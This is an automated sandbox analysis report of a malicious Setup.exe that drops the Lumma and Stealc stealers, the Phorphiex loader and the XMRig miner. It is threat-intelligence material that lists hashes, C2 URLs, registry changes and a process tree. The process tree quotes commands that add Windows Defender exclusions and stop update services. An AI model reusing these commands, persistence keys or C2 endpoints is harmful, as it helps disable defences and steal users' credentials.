lumma | 528e99b50effe50e07b98e77ab5abbc6ea9a0a5a3c20d27a2c104ff4184ba54c

Analysis

max time kernel
146s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-10-2024 19:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe
Size

12KB
MD5

a14e63d27e1ac1df185fa062103aa9aa
SHA1

2b64c35e4eff4a43ab6928979b6093b95f9fd714
SHA256

dda39f19837168845de33959de34bcfb7ee7f3a29ae55c9fa7f4cb12cb27f453
SHA512

10418efcce2970dcdbef1950464c4001753fccb436f4e8ba5f08f0d4d5c9b4a22a48f2803e59421b720393d84cfabd338497c0bc77cdd4548990930b9c350082
SSDEEP

192:brl2reIazGejA7HhdSbw/z1ULU87glpK/b26J4S1Xu85:b52r+xjALhMWULU870gJJ

Score

10^/10

lumma phorphiex stealc xmrig mainteam credential_access defense_evasion discovery evasion execution loader miner persistence spyware stealer trojan upx worm

Malware Config

Extracted

Family

stealc

Botnet

mainteam

http://95.182.96.50

Attributes

url_path
/2aced82320799c96.php

Extracted

Family

lumma

https://tryyudjasudqo.shop/api

https://eemmbryequo.shop/api

https://reggwardssdqw.shop/api

https://relaxatinownio.shop/api

https://tesecuuweqo.shop/api

https://tendencctywop.shop/api

https://licenseodqwmqn.shop/api

https://keennylrwmqlw.shop/api

https://deficticoepwqm.shop/api

https://optinewlip.shop/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysppvrdnvs.exe

Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023cdc-15.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/764-384-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/764-386-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/764-387-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/764-390-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/764-389-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/764-388-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/764-383-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

flow	pid	Process
123	1788	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1788	powershell.exe
544	powershell.exe
928	powershell.exe
5072	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	sysppvrdnvs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Edge.exe

Executes dropped EXE 17 IoCs

pid	Process
4664	http185.215.113.66pei.exe.exe
1804	httptwizt.netnewtpp.exe.exe
2224	http31.41.244.11filesEDge.exe.exe
4064	sysppvrdnvs.exe
4388	Edge.exe
1312	324343804.exe
4916	httpsdewatabalirental.com2.exe.exe
3664	httpsdewatabalirental.com1.exe.exe
2908	httpsdewatabalirental.com3.exe.exe
2596	httpsdewatabalirental.com4.exe.exe
2180	httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe
4180	httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe
2132	httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe
4032	httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe
3196	httpbitbucket.orgkcatelinjamesondownloadseasyfirewall.exe.exe
100	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
3444	Updater.exe

Loads dropped DLL 2 IoCs

pid	Process
4916	httpsdewatabalirental.com2.exe.exe
4916	httpsdewatabalirental.com2.exe.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe"	httptwizt.netnewtpp.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{AB1F3E47-AEF1-400E-A108-233A046C3A34} = "C:\\Users\\Admin\\AppData\\Roaming\\Edge\\Edge.exe {5E0DB032-E9D6-4C1D-A145-C083BA9C5AAA}"	Edge.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
59	bitbucket.org
60	bitbucket.org
102	bitbucket.org

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2908 set thread context of 5020	2908	httpsdewatabalirental.com3.exe.exe	123
PID 2180 set thread context of 3448	2180	httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe	133
PID 4180 set thread context of 1784	4180	httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe	138
PID 2132 set thread context of 1464	2132	httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe	143
PID 4032 set thread context of 3944	4032	httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe	148

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/764-379-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/764-384-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/764-386-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/764-387-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/764-390-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/764-389-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/764-388-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/764-382-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/764-380-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/764-383-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/764-378-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/764-381-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\sysppvrdnvs.exe	httptwizt.netnewtpp.exe.exe
File opened for modification	C:\Windows\sysppvrdnvs.exe	httptwizt.netnewtpp.exe.exe

Launches sc.exe 19 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4936	sc.exe
4152	sc.exe
3468	sc.exe
2168	sc.exe
4652	sc.exe
2080	sc.exe
1120	sc.exe
3660	sc.exe
4180	sc.exe
4568	sc.exe
2140	sc.exe
4644	sc.exe
3012	sc.exe
4348	sc.exe
3460	sc.exe
3120	sc.exe
2712	sc.exe
1608	sc.exe
4604	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2000	3664	WerFault.exe	117

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsdewatabalirental.com3.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsdewatabalirental.com4.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.66pei.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httptwizt.netnewtpp.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysppvrdnvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsdewatabalirental.com2.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	324343804.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsdewatabalirental.com1.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	httpsdewatabalirental.com2.exe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	httpsdewatabalirental.com2.exe.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
544	powershell.exe
544	powershell.exe
544	powershell.exe
4916	httpsdewatabalirental.com2.exe.exe
4916	httpsdewatabalirental.com2.exe.exe
4916	httpsdewatabalirental.com2.exe.exe
4916	httpsdewatabalirental.com2.exe.exe
4916	httpsdewatabalirental.com2.exe.exe
4916	httpsdewatabalirental.com2.exe.exe
3664	httpsdewatabalirental.com1.exe.exe
3664	httpsdewatabalirental.com1.exe.exe
1788	powershell.exe
1788	powershell.exe
100	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
928	powershell.exe
928	powershell.exe
100	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
100	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
100	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
100	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
100	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
100	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
100	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
100	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
100	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
100	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
3444	Updater.exe
5072	powershell.exe
5072	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	2444	Setup.exe
Token: SeDebugPrivilege	544	powershell.exe
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	3196	httpbitbucket.orgkcatelinjamesondownloadseasyfirewall.exe.exe
Token: SeDebugPrivilege	928	powershell.exe
Token: SeDebugPrivilege	100	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
Token: SeDebugPrivilege	5072	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2444 wrote to memory of 4664	2444	Setup.exe	97
PID 2444 wrote to memory of 4664	2444	Setup.exe	97
PID 2444 wrote to memory of 4664	2444	Setup.exe	97
PID 2444 wrote to memory of 1804	2444	Setup.exe	98
PID 2444 wrote to memory of 1804	2444	Setup.exe	98
PID 2444 wrote to memory of 1804	2444	Setup.exe	98
PID 2444 wrote to memory of 2224	2444	Setup.exe	99
PID 2444 wrote to memory of 2224	2444	Setup.exe	99
PID 1804 wrote to memory of 4064	1804	httptwizt.netnewtpp.exe.exe	100
PID 1804 wrote to memory of 4064	1804	httptwizt.netnewtpp.exe.exe	100
PID 1804 wrote to memory of 4064	1804	httptwizt.netnewtpp.exe.exe	100
PID 2224 wrote to memory of 4388	2224	http31.41.244.11filesEDge.exe.exe	101
PID 2224 wrote to memory of 4388	2224	http31.41.244.11filesEDge.exe.exe	101
PID 4664 wrote to memory of 1312	4664	http185.215.113.66pei.exe.exe	102
PID 4664 wrote to memory of 1312	4664	http185.215.113.66pei.exe.exe	102
PID 4664 wrote to memory of 1312	4664	http185.215.113.66pei.exe.exe	102
PID 4064 wrote to memory of 2084	4064	sysppvrdnvs.exe	103
PID 4064 wrote to memory of 2084	4064	sysppvrdnvs.exe	103
PID 4064 wrote to memory of 2084	4064	sysppvrdnvs.exe	103
PID 4064 wrote to memory of 3472	4064	sysppvrdnvs.exe	105
PID 4064 wrote to memory of 3472	4064	sysppvrdnvs.exe	105
PID 4064 wrote to memory of 3472	4064	sysppvrdnvs.exe	105
PID 2084 wrote to memory of 544	2084	cmd.exe	107
PID 2084 wrote to memory of 544	2084	cmd.exe	107
PID 2084 wrote to memory of 544	2084	cmd.exe	107
PID 3472 wrote to memory of 3468	3472	cmd.exe	108
PID 3472 wrote to memory of 3468	3472	cmd.exe	108
PID 3472 wrote to memory of 3468	3472	cmd.exe	108
PID 3472 wrote to memory of 2140	3472	cmd.exe	109
PID 3472 wrote to memory of 2140	3472	cmd.exe	109
PID 3472 wrote to memory of 2140	3472	cmd.exe	109
PID 3472 wrote to memory of 2168	3472	cmd.exe	110
PID 3472 wrote to memory of 2168	3472	cmd.exe	110
PID 3472 wrote to memory of 2168	3472	cmd.exe	110
PID 3472 wrote to memory of 4652	3472	cmd.exe	111
PID 3472 wrote to memory of 4652	3472	cmd.exe	111
PID 3472 wrote to memory of 4652	3472	cmd.exe	111
PID 3472 wrote to memory of 3660	3472	cmd.exe	112
PID 3472 wrote to memory of 3660	3472	cmd.exe	112
PID 3472 wrote to memory of 3660	3472	cmd.exe	112
PID 2444 wrote to memory of 4916	2444	Setup.exe	116
PID 2444 wrote to memory of 4916	2444	Setup.exe	116
PID 2444 wrote to memory of 4916	2444	Setup.exe	116
PID 2444 wrote to memory of 3664	2444	Setup.exe	117
PID 2444 wrote to memory of 3664	2444	Setup.exe	117
PID 2444 wrote to memory of 3664	2444	Setup.exe	117
PID 2444 wrote to memory of 2908	2444	Setup.exe	118
PID 2444 wrote to memory of 2908	2444	Setup.exe	118
PID 2444 wrote to memory of 2908	2444	Setup.exe	118
PID 2444 wrote to memory of 2596	2444	Setup.exe	119
PID 2444 wrote to memory of 2596	2444	Setup.exe	119
PID 2444 wrote to memory of 2596	2444	Setup.exe	119
PID 2908 wrote to memory of 5020	2908	httpsdewatabalirental.com3.exe.exe	123
PID 2908 wrote to memory of 5020	2908	httpsdewatabalirental.com3.exe.exe	123
PID 2908 wrote to memory of 5020	2908	httpsdewatabalirental.com3.exe.exe	123
PID 2908 wrote to memory of 5020	2908	httpsdewatabalirental.com3.exe.exe	123
PID 2908 wrote to memory of 5020	2908	httpsdewatabalirental.com3.exe.exe	123
PID 2908 wrote to memory of 5020	2908	httpsdewatabalirental.com3.exe.exe	123
PID 2908 wrote to memory of 5020	2908	httpsdewatabalirental.com3.exe.exe	123
PID 2908 wrote to memory of 5020	2908	httpsdewatabalirental.com3.exe.exe	123
PID 2908 wrote to memory of 5020	2908	httpsdewatabalirental.com3.exe.exe	123
PID 2908 wrote to memory of 5020	2908	httpsdewatabalirental.com3.exe.exe	123
PID 5020 wrote to memory of 1788	5020	BitLockerToGo.exe	128
PID 5020 wrote to memory of 1788	5020	BitLockerToGo.exe	128

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4664
- - C:\Users\Admin\AppData\Local\Temp\324343804.exe
    C:\Users\Admin\AppData\Local\Temp\324343804.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1312
- C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1804
- - C:\Windows\sysppvrdnvs.exe
    C:\Windows\sysppvrdnvs.exe
    3⤵
    - Modifies security service
    - Windows security bypass
    - Checks computer location settings
    - Executes dropped EXE
    - Windows security modification
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4064
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2084
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:544
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3472
